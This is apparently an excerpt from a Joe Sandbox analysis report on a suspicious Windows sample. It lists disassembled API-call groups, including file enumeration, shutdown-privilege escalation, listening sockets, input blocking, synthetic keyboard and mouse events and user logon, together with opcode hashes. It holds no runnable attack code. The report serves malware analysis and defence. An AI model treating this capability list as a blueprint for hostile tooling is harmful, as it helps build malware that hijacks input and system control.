                                                      • Part of subcall function 00781A36: _memmove.LIBCMT ref: 00781A77
                                                    • FindFirstFileW.KERNEL32(?,?,*.*,?,?,00000000,00000000), ref: 007DFA83
                                                    • FindClose.KERNEL32(00000000), ref: 007DFB96
                                                      • Part of subcall function 007752B0: PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 007752E6
                                                    • Sleep.KERNEL32(0000000A), ref: 007DFAB3
                                                    • _wcscmp.LIBCMT ref: 007DFAC7
                                                    • _wcscmp.LIBCMT ref: 007DFAE2
                                                    • FindNextFileW.KERNEL32(?,?), ref: 007DFB80
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000013.00000002.2255906957.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true
                                                    • Associated: 00000013.00000002.2255889922.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2255972069.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2255972069.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2256017009.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2256035027.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_19_2_770000_Labs.jbxd
                                                    Similarity
                                                    • API ID: Find$File_wcscmp$CloseFirstMessageNextPeekSleep_memmove
                                                    • String ID: *.*
                                                    • API String ID: 2185952417-438819550
                                                    • Opcode ID: 9b39e3f25ab86f1ee8726a6a13c2c0bc3c68e86cf26caa163c8a93ea723f8361
                                                    • Instruction ID: 041429db76404c4aa29c9b2ec19bbfddb8b00ff239347ffada9bc777d72e0d18
                                                    • Opcode Fuzzy Hash: 9b39e3f25ab86f1ee8726a6a13c2c0bc3c68e86cf26caa163c8a93ea723f8361
                                                    • Instruction Fuzzy Hash: 4C4170B194021A9FCF14DF64CC59AEEBBB8FF05350F548167E819A2291EB389E45CF90
                                                    APIs
                                                      • Part of subcall function 007C9399: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 007C93E3
                                                      • Part of subcall function 007C9399: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 007C9410
                                                      • Part of subcall function 007C9399: GetLastError.KERNEL32 ref: 007C941D
                                                    • ExitWindowsEx.USER32(?,00000000), ref: 007D57B4
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000013.00000002.2255906957.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true
                                                    • Associated: 00000013.00000002.2255889922.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2255972069.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2255972069.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2256017009.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2256035027.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_19_2_770000_Labs.jbxd
                                                    Similarity
                                                    • API ID: AdjustErrorExitLastLookupPrivilegePrivilegesTokenValueWindows
                                                    • String ID: $@$SeShutdownPrivilege
                                                    • API String ID: 2234035333-194228
                                                    • Opcode ID: 77fa3dc330809d3d1c27983f88b77a31547152811cedd9d79a65ea27466869f1
                                                    • Instruction ID: b1c999189ad5600f9ea08af4e31665447676f41227cd8bf244a0ad1243f54cb3
                                                    • Opcode Fuzzy Hash: 77fa3dc330809d3d1c27983f88b77a31547152811cedd9d79a65ea27466869f1
                                                    • Instruction Fuzzy Hash: E601F731751712EBE76862A49C8EFBB7778EB04770F34002BF913D22D2DA685C008550
                                                    APIs
                                                    • socket.WSOCK32(00000002,00000001,00000006,?,00000002,00000000), ref: 007E69C7
                                                    • WSAGetLastError.WSOCK32(00000000), ref: 007E69D6
                                                    • bind.WSOCK32(00000000,?,00000010), ref: 007E69F2
                                                    • listen.WSOCK32(00000000,00000005), ref: 007E6A01
                                                    • WSAGetLastError.WSOCK32(00000000), ref: 007E6A1B
                                                    • closesocket.WSOCK32(00000000,00000000), ref: 007E6A2F
                                                    Memory Dump Source
                                                    • Source File: 00000013.00000002.2255906957.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true
                                                    • Associated: 00000013.00000002.2255889922.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2255972069.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2255972069.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2256017009.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2256035027.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_19_2_770000_Labs.jbxd
                                                    Similarity
                                                    • API ID: ErrorLast$bindclosesocketlistensocket
                                                    • String ID:
                                                    • API String ID: 1279440585-0
                                                    • Opcode ID: 263ed1a43b9b069f197d9e9d4d37f140cd4494f2e598be590cb48165a927049f
                                                    • Instruction ID: cf8312b2dd2087edc50563581911f1cecff112f6444106add1216f27743ddd30
                                                    • Opcode Fuzzy Hash: 263ed1a43b9b069f197d9e9d4d37f140cd4494f2e598be590cb48165a927049f
                                                    • Instruction Fuzzy Hash: D6219170600604DFCB50EF64CC49B6EB7A9EF48760F14C569E95AA7391CB78AC01CB91
                                                    APIs
                                                      • Part of subcall function 007729E2: GetWindowLongW.USER32(?,000000EB), ref: 007729F3
                                                    • DefDlgProcW.USER32(?,?,?,?,?), ref: 00771DD6
                                                    • GetSysColor.USER32(0000000F), ref: 00771E2A
                                                    • SetBkColor.GDI32(?,00000000), ref: 00771E3D
                                                      • Part of subcall function 0077166C: DefDlgProcW.USER32(?,00000020,?), ref: 007716B4
                                                    Memory Dump Source
                                                    • Source File: 00000013.00000002.2255906957.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true
                                                    • Associated: 00000013.00000002.2255889922.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2255972069.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2255972069.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2256017009.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2256035027.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_19_2_770000_Labs.jbxd
                                                    Similarity
                                                    • API ID: ColorProc$LongWindow
                                                    • String ID:
                                                    • API String ID: 3744519093-0
                                                    • Opcode ID: 4b1ea1bb7b606ffbc45aa69047cca9dce068632fb0e838aefa70bd8029e6d779
                                                    • Instruction ID: bcbe69ac337071af7e32b8414d0688de4443a78c4f5051de83951cb26d526c3a
                                                    • Opcode Fuzzy Hash: 4b1ea1bb7b606ffbc45aa69047cca9dce068632fb0e838aefa70bd8029e6d779
                                                    • Instruction Fuzzy Hash: 3DA17CB0305408FADF3C6B6D4C49E7B255EEB82381F94C60AF509D5182CA2DDD01DB75
                                                    APIs
                                                    • FindFirstFileW.KERNEL32(?,?), ref: 007DC329
                                                    • _wcscmp.LIBCMT ref: 007DC359
                                                    • _wcscmp.LIBCMT ref: 007DC36E
                                                    • FindNextFileW.KERNEL32(00000000,?), ref: 007DC37F
                                                    • FindClose.KERNEL32(00000000,00000001,00000000), ref: 007DC3AF
                                                    Memory Dump Source
                                                    • Source File: 00000013.00000002.2255906957.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true
                                                    • Associated: 00000013.00000002.2255889922.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2255972069.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2255972069.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2256017009.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2256035027.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_19_2_770000_Labs.jbxd
                                                    Similarity
                                                    • API ID: Find$File_wcscmp$CloseFirstNext
                                                    • String ID:
                                                    • API String ID: 2387731787-0
                                                    • Opcode ID: c194317a40a14fdb8ccd2899b67cf454a7abe847fb8ee71dcf648c22665d8a72
                                                    • Instruction ID: 0cb071ff5d46cf231230197d72d287112c8b6f4a232a95bc02ba35af4a54471a
                                                    • Opcode Fuzzy Hash: c194317a40a14fdb8ccd2899b67cf454a7abe847fb8ee71dcf648c22665d8a72
                                                    • Instruction Fuzzy Hash: F1518935604602CFD715DF68D494AAAB7E8FF49320F10861EE95ACB3A1DB38AD05CB91
                                                    APIs
                                                      • Part of subcall function 007E8475: inet_addr.WSOCK32(00000000,?,00000000,?,?,?,00000000), ref: 007E84A0
                                                    • socket.WSOCK32(00000002,00000002,00000011,?,?,00000000), ref: 007E6E89
                                                    • WSAGetLastError.WSOCK32(00000000), ref: 007E6EB2
                                                    • bind.WSOCK32(00000000,?,00000010), ref: 007E6EEB
                                                    • WSAGetLastError.WSOCK32(00000000), ref: 007E6EF8
                                                    • closesocket.WSOCK32(00000000,00000000), ref: 007E6F0C
                                                    Memory Dump Source
                                                    • Source File: 00000013.00000002.2255906957.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true
                                                    • Associated: 00000013.00000002.2255889922.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2255972069.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2255972069.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2256017009.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2256035027.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_19_2_770000_Labs.jbxd
                                                    Similarity
                                                    • API ID: ErrorLast$bindclosesocketinet_addrsocket
                                                    • String ID:
                                                    • API String ID: 99427753-0
                                                    • Opcode ID: ad4ea584d76a8af8a8a2c852a302c4342d13e71ae3cf76b62cf86999e8ebecaa
                                                    • Instruction ID: 3362a015bb197b51cbeb8119b50da4b303183dc377c90e9646091b2f912456fc
                                                    • Opcode Fuzzy Hash: ad4ea584d76a8af8a8a2c852a302c4342d13e71ae3cf76b62cf86999e8ebecaa
                                                    • Instruction Fuzzy Hash: 4E41A275700214EFDF20AF649C8AF6E77A8EB48750F04C558FA59AB3D2DB789D008B91
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000013.00000002.2255906957.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true
                                                    • Associated: 00000013.00000002.2255889922.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2255972069.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2255972069.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2256017009.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2256035027.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_19_2_770000_Labs.jbxd
                                                    Similarity
                                                    • API ID: Window$EnabledForegroundIconicVisibleZoomed
                                                    • String ID:
                                                    • API String ID: 292994002-0
                                                    • Opcode ID: 24cfeb951b01e72b2579a46bca282bd1e0f6c651eceb7fa05e2c6fc320665990
                                                    • Instruction ID: 5b133b7e595ab629ac2b2321df30444571014090c74fd16f4f5e1cadc6a2b59f
                                                    • Opcode Fuzzy Hash: 24cfeb951b01e72b2579a46bca282bd1e0f6c651eceb7fa05e2c6fc320665990
                                                    • Instruction Fuzzy Hash: 1D118672300A159FEB215F26DC88B3A7B99FF44761F058129EA45D7341DB78AD118ED0
                                                    APIs
                                                    • LoadLibraryA.KERNEL32(kernel32.dll,?,007B027A,?), ref: 007EC6E7
                                                    • GetProcAddress.KERNEL32(00000000,GetSystemWow64DirectoryW), ref: 007EC6F9
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000013.00000002.2255906957.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true
                                                    • Associated: 00000013.00000002.2255889922.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2255972069.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2255972069.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2256017009.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2256035027.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_19_2_770000_Labs.jbxd
                                                    Similarity
                                                    • API ID: AddressLibraryLoadProc
                                                    • String ID: GetSystemWow64DirectoryW$kernel32.dll
                                                    • API String ID: 2574300362-1816364905
                                                    • Opcode ID: 201d458a5440980e2ee2fd8f40bef48817541db2512243b2162742db15d25976
                                                    • Instruction ID: b298d36120eef0f6e7878e64138de2cdee962b043cf72cad33ed92e282eaae7d
                                                    • Opcode Fuzzy Hash: 201d458a5440980e2ee2fd8f40bef48817541db2512243b2162742db15d25976
                                                    • Instruction Fuzzy Hash: 7FE0C73C2027528FE7214B2ACC4AB427BE8FF0C308F80842AE895C2350EB78C880CF10
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000013.00000002.2255906957.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true
                                                    • Associated: 00000013.00000002.2255889922.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2255972069.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2255972069.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2256017009.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2256035027.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_19_2_770000_Labs.jbxd
                                                    Similarity
                                                    • API ID: LocalTime__swprintf
                                                    • String ID: %.3d$WIN_XPe
                                                    • API String ID: 2070861257-2409531811
                                                    • Opcode ID: 39c53f23469173fcabb6e3c67fb83ff37c7666309e0c089257d288a37102ac76
                                                    • Instruction ID: e32425fa2fdb5ee13f476c7b8e9934a9c5e3712eb849db186c88b9f70ee89b9a
                                                    • Opcode Fuzzy Hash: 39c53f23469173fcabb6e3c67fb83ff37c7666309e0c089257d288a37102ac76
                                                    • Instruction Fuzzy Hash: 19D01271804218EACB08AA90D848FFB737CFB04300F144052F546E2040D23D9798EB62
                                                    APIs
                                                    • CreateFileW.KERNEL32(?,00000080,00000003,00000000,00000003,00000080,00000000), ref: 007D4271
                                                    • DeviceIoControl.KERNEL32(00000000,002D1400,?,0000000C,?,00000028,?,00000000), ref: 007D42B2
                                                    • CloseHandle.KERNEL32(?,?,00000080,00000003,00000000,00000003,00000080,00000000), ref: 007D42BD
                                                    Memory Dump Source
                                                    • Source File: 00000013.00000002.2255906957.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true
                                                    • Associated: 00000013.00000002.2255889922.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2255972069.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2255972069.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2256017009.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2256035027.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_19_2_770000_Labs.jbxd
                                                    Similarity
                                                    • API ID: CloseControlCreateDeviceFileHandle
                                                    • String ID:
                                                    • API String ID: 33631002-0
                                                    • Opcode ID: 6c9f8d72f19bd2ed4dd533ef74c3a3f4f8af3ee4f38dc6096560f2aaedf440dc
                                                    • Instruction ID: 1e198e8d611b819ead56fca744e51151f6a145850397039fc20487773a8fc1ee
                                                    • Opcode Fuzzy Hash: 6c9f8d72f19bd2ed4dd533ef74c3a3f4f8af3ee4f38dc6096560f2aaedf440dc
                                                    • Instruction Fuzzy Hash: 72113C75E01228BBDB608FA5EC45BAFBBBCFB45B60F104156FD04E7390C6745A018BA1
                                                    APIs
                                                    • AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?,?), ref: 007D4F45
                                                    • CheckTokenMembership.ADVAPI32(00000000,?,?), ref: 007D4F5C
                                                    • FreeSid.ADVAPI32(?), ref: 007D4F6C
                                                    Memory Dump Source
                                                    • Source File: 00000013.00000002.2255906957.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true
                                                    • Associated: 00000013.00000002.2255889922.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2255972069.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2255972069.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2256017009.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2256035027.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_19_2_770000_Labs.jbxd
                                                    Similarity
                                                    • API ID: AllocateCheckFreeInitializeMembershipToken
                                                    • String ID:
                                                    • API String ID: 3429775523-0
                                                    • Opcode ID: 92643a1f8b8aa35c43ce10b3757e72eae778d0bb91158a28567355c1a4c00bea
                                                    • Instruction ID: b7db8dfd7ee21c7d9d56eb66976824ee7aff479899ec66fe71afb54cf1987e94
                                                    • Opcode Fuzzy Hash: 92643a1f8b8aa35c43ce10b3757e72eae778d0bb91158a28567355c1a4c00bea
                                                    • Instruction Fuzzy Hash: E9F04975A1130CBFEF00DFE0DC89AAEBBBCFF08201F0044A9A901E2290E7346A048B50
                                                    APIs
                                                    • SendInput.USER32(00000001,?,0000001C,?,?,00000002), ref: 007D1B01
                                                    • keybd_event.USER32(?,75A4C0D0,?,00000000), ref: 007D1B14
                                                    Memory Dump Source
                                                    • Source File: 00000013.00000002.2255906957.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true
                                                    • Associated: 00000013.00000002.2255889922.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2255972069.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2255972069.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2256017009.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2256035027.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_19_2_770000_Labs.jbxd
                                                    Similarity
                                                    • API ID: InputSendkeybd_event
                                                    • String ID:
                                                    • API String ID: 3536248340-0
                                                    • Opcode ID: 58603dd1903cced3932d45beccbbffaf759559a335564e5d21b0afaa49a7b5c4
                                                    • Instruction ID: 5970dc8b8b666f4ac481746d60e827d7d247bdb7110dd0f692055dc28f87f1b2
                                                    • Opcode Fuzzy Hash: 58603dd1903cced3932d45beccbbffaf759559a335564e5d21b0afaa49a7b5c4
                                                    • Instruction Fuzzy Hash: C2F0497190024DABDB04CF94C806BFE7BB4FF04315F00804AF955A6292D3799615DF94
                                                    APIs
                                                    • GetLastError.KERNEL32(00000000,?,00000FFF,00000000,?,?,007E9B52,?,0080098C,?), ref: 007DA6DA
                                                    • FormatMessageW.KERNEL32(00001000,00000000,000000FF,00000000,?,00000FFF,00000000,?,?,007E9B52,?,0080098C,?), ref: 007DA6EC
                                                    Memory Dump Source
                                                    • Source File: 00000013.00000002.2255906957.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true
                                                    • Associated: 00000013.00000002.2255889922.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2255972069.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2255972069.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2256017009.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2256035027.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_19_2_770000_Labs.jbxd
                                                    Similarity
                                                    • API ID: ErrorFormatLastMessage
                                                    • String ID:
                                                    • API String ID: 3479602957-0
                                                    • Opcode ID: e467a2131dc03d5dd099a7533cade232cf2e896675c13d63bb78a88688f252c2
                                                    • Instruction ID: e05b4a3545082b4fa192048f0ee3a701161ab3090e1b8cde3190cb951c1750fc
                                                    • Opcode Fuzzy Hash: e467a2131dc03d5dd099a7533cade232cf2e896675c13d63bb78a88688f252c2
                                                    • Instruction Fuzzy Hash: B5F0823550522EFBDB21AFA4CC49FEA776CBF09761F008256B90896281DA349A40CFA1
                                                    APIs
                                                    • SetUnhandledExceptionFilter.KERNEL32(00000000,?,00798F87,?,?,?,00000001), ref: 0079A38A
                                                    • UnhandledExceptionFilter.KERNEL32(?,?,?,00000001), ref: 0079A393
                                                    Memory Dump Source
                                                    • Source File: 00000013.00000002.2255906957.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true
                                                    • Associated: 00000013.00000002.2255889922.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2255972069.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2255972069.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2256017009.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2256035027.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_19_2_770000_Labs.jbxd
                                                    Similarity
                                                    • API ID: ExceptionFilterUnhandled
                                                    • String ID:
                                                    • API String ID: 3192549508-0
                                                    • Opcode ID: 061bbd7794092d9b8583d4e1d05557f46d0c14fba4f7fd6b4f0f5a41a4e018cd
                                                    • Instruction ID: f5637d81f21d1845542d3e984b2fe6bfcbc6f2e2ef5697a2b0732f8f51a67e8a
                                                    • Opcode Fuzzy Hash: 061bbd7794092d9b8583d4e1d05557f46d0c14fba4f7fd6b4f0f5a41a4e018cd
                                                    • Instruction Fuzzy Hash: 8BB09231065208ABCA822BD1EC09B883F68FB45A62F014010F60D44260CB6254508E91
                                                    APIs
                                                    • BlockInput.USER32(00000001), ref: 007E45F0
                                                    Memory Dump Source
                                                    • Source File: 00000013.00000002.2255906957.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true
                                                    • Associated: 00000013.00000002.2255889922.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2255972069.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2255972069.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2256017009.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2256035027.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_19_2_770000_Labs.jbxd
                                                    Similarity
                                                    • API ID: BlockInput
                                                    • String ID:
                                                    • API String ID: 3456056419-0
                                                    • Opcode ID: 953ff26e68b606f9352ac3e1c08b91d110483894855fd4ba45f7f61f11dfa70f
                                                    • Instruction ID: 8b7492e3c66c95ce5156e7bd3bff0d04c3e9d9ee77aedbf15dda1ede33b97424
                                                    • Opcode Fuzzy Hash: 953ff26e68b606f9352ac3e1c08b91d110483894855fd4ba45f7f61f11dfa70f
                                                    • Instruction Fuzzy Hash: E7E0DF312002099FC710AF6AE804A8AF7E8AF987A0F00C016FC49C7310DBB4EC10CB90
                                                    APIs
                                                    • mouse_event.USER32(00000002,00000000,00000000,00000000,00000000), ref: 007D5205
                                                    Memory Dump Source
                                                    • Source File: 00000013.00000002.2255906957.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true
                                                    • Associated: 00000013.00000002.2255889922.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2255972069.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2255972069.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2256017009.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2256035027.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_19_2_770000_Labs.jbxd
                                                    Similarity
                                                    • API ID: mouse_event
                                                    • String ID:
                                                    • API String ID: 2434400541-0
                                                    • Opcode ID: f3cba4f7cc38f62da89713f13d590e585e11bbad55ccb57a3e3b7d6f98c555ad
                                                    • Instruction ID: 731af3932b92695dfb3b17e259579c30caedfd06b47e60b9a6625845bb19f86f
                                                    • Opcode Fuzzy Hash: f3cba4f7cc38f62da89713f13d590e585e11bbad55ccb57a3e3b7d6f98c555ad
                                                    • Instruction Fuzzy Hash: 45D092A6160E0EBBED5807249E1FF761628F3017C1F94468B7342992C2ECDEA885A831
                                                    APIs
                                                    • LogonUserW.ADVAPI32(?,00000001,?,?,00000000,007C8FA7), ref: 007C9389
                                                    Memory Dump Source
                                                    • Source File: 00000013.00000002.2255906957.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true
                                                    • Associated: 00000013.00000002.2255889922.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2255972069.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2255972069.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2256017009.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2256035027.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_19_2_770000_Labs.jbxd
                                                    Similarity
                                                    • API ID: LogonUser
                                                    • String ID:
                                                    • API String ID: 1244722697-0
                                                    • Opcode ID: ea1a3c9bc1e9ce8dcb363471d3d40c315f23621c534f888291618cf3946a6772
                                                    • Instruction ID: c81afaaacd9f0b35017b8b6aa7d9427d3cb634a66fdbc4b303db7b78977f6c4f
                                                    • Opcode Fuzzy Hash: ea1a3c9bc1e9ce8dcb363471d3d40c315f23621c534f888291618cf3946a6772
                                                    • Instruction Fuzzy Hash: EDD05E3226090EABEF018EA4DC01EAF3B69EB04B01F408111FE15C50A0C775D835AF60
                                                    APIs
                                                    • GetUserNameW.ADVAPI32(?,?), ref: 007B0734
                                                    Memory Dump Source
                                                    • Source File: 00000013.00000002.2255906957.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true
                                                    • Associated: 00000013.00000002.2255889922.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2255972069.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2255972069.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2256017009.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2256035027.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_19_2_770000_Labs.jbxd
